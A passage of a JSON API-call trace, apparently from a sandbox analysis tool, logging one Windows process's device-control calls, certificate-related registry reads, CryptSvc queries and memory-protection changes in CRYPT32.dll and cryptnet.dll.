\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2567 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x98\\x90X\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2568 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x98\\x90X\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2569 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0\\x95X\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2570 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0\\x95X\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2571 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\x9bX\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2572 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\x9bX\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2573 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7701fae4", + "parentcaller": "0x7701f7cb", + "category": "process", + "api": "NtFreeVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00577000" + }, + { + "name": "RegionSize", + "value": "0x00017000" + }, + { + "name": "FreeType", + "value": "0x00004000" + } + ], + "repeated": 0, + "id": 2574 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2575 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2576 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "ValueName", + "value": "SyncDeltaTime" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\SyncDeltaTime" + } + ], + "repeated": 0, + "id": 2577 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "ValueName", + "value": "RootDirUrl" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\RootDirUrl" + } + ], + "repeated": 0, + "id": 2578 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2579 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2580 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "ValueName", + "value": "Flags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\Flags" + } + ], + "repeated": 0, + "id": 2581 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2582 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2583 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x767e4f1f", + "parentcaller": "0x767e4e04", + "category": "services", + "api": "OpenSCManagerW", + "status": true, + "return": "0x0055c248", + "arguments": [ + { + "name": "MachineName", + "value": "" + }, + { + "name": "DatabaseName", + "value": "" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "SC_MANAGER_CONNECT" + } + ], + "repeated": 0, + "id": 2584 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x767e4f3b", + "parentcaller": "0x767e4e04", + "category": "services", + "api": "OpenServiceW", + "status": true, + "return": "0x005772d8", + "arguments": [ + { + "name": "ServiceControlManager", + "value": "0x0055c248" + }, + { + "name": "ServiceName", + "value": "CryptSvc" + }, + { + "name": "DesiredAccess", + "value": "0x00000005", + "pretty_value": "SERVICE_QUERY_CONFIG|SERVICE_QUERY_STATUS" + } + ], + "repeated": 0, + "id": 2585 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2586 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2587 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x767e503a", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x0000059c" + } + ], + "repeated": 0, + "id": 2588 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e507b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "x\\xed[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00 \\xee[\\x05\\xefb\\x03wC\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x7f\\x07\\x00\\x00\\xb0\\x03I\\x00\\x01\\x00\\x00\\x00M,Dl;\\x00\\x00\\x00$\\xee[\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00)/\\x00\\x00\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80lW\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\xc0\\x00I\\x00\\xa8MS\\x00h\\x08\\x1d\\x00\\x00\\x00\\x00\\x00\\x14{\\x07w8~V\\x00\\x00\\x00I\\x00\\x00\\x00\\x00\\x00\\x14{\\x07w`WS\\x00\\x00\\x00I\\x00`WS\\x00\\x03\\x00\\x00\\x00d\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0\\xc4U\\x00g\\x00\\x00\\x00d\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8LS\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x08\\x00\\x80PS\\x00`WS\\x00d+\\x10u\\x10\\xeb[\\x05\\x1c\\xec[\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2589 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2590 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2591 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2592 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2593 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2594 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "7084", + "caller": "0x756bfbba", + "parentcaller": "0x76879fe8", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "cryptnet.dll" + }, + { + "name": "ModuleHandle", + "value": "0x74200000" + }, + { + "name": "FunctionName", + "value": "CryptRetrieveObjectByUrlW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74209ad0" + } + ], + "repeated": 0, + "id": 2595 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x742044c4", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000002" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\cryptnet.dll" + }, + { + "name": "BaseAddress", + "value": "0x74200000" + } + ], + "repeated": 0, + "id": 2596 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "7084", + "caller": "0x756d7637", + "parentcaller": "0x761115d7", + "category": "threading", + "api": "NtCreateThreadEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x000006bc" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "StartAddress", + "value": "0x74205bb0" + }, + { + "name": "Parameter", + "value": "0x00576c80" + }, + { + "name": "CreateFlags", + "value": "0x00000001" + }, + { + "name": "ThreadId", + "value": "9928" + }, + { + "name": "ProcessId", + "value": "9448" + }, + { + "name": "Module", + "value": "cryptnet.dll" + } + ], + "repeated": 0, + "id": 2597 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2598 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756ad931", + "parentcaller": "0x756ac98b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2599 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006bc" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Cryptography\\OID" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID" + } + ], + "repeated": 0, + "id": 2600 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006bc" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 2601 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006c4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006bc" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 0" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0" + } + ], + "repeated": 0, + "id": 2602 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006c4" + }, + { + "name": "ObjectAttributesName", + "value": "SchemeDllRetrieveEncodedObjectW" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\SchemeDllRetrieveEncodedObjectW" + } + ], + "repeated": 0, + "id": 2603 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006bc" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 2604 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006c4" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006bc" + }, + { + "name": "ObjectAttributesName", + "value": "EncodingType 1" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1" + } + ], + "repeated": 0, + "id": 2605 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fcf49", + "parentcaller": "0x756ac9db", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006c4" + }, + { + "name": "ObjectAttributesName", + "value": "SchemeDllRetrieveEncodedObjectW" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 1\\SchemeDllRetrieveEncodedObjectW" + } + ], + "repeated": 0, + "id": 2606 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x756fd269", + "parentcaller": "0x756aadee", + "category": "registry", + "api": "NtEnumerateKey", + "status": false, + "return": "0xffffffff8000001a", + "pretty_return": "NO_MORE_ENTRIES", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006bc" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 2607 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74222000" + }, + { + "name": "ModuleName", + "value": "cryptnet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2608 + }, + { + "timestamp": "2025-03-07 21:41:29,703", + "thread_id": "9928", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74222000" + }, + { + "name": "ModuleName", + "value": "cryptnet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": 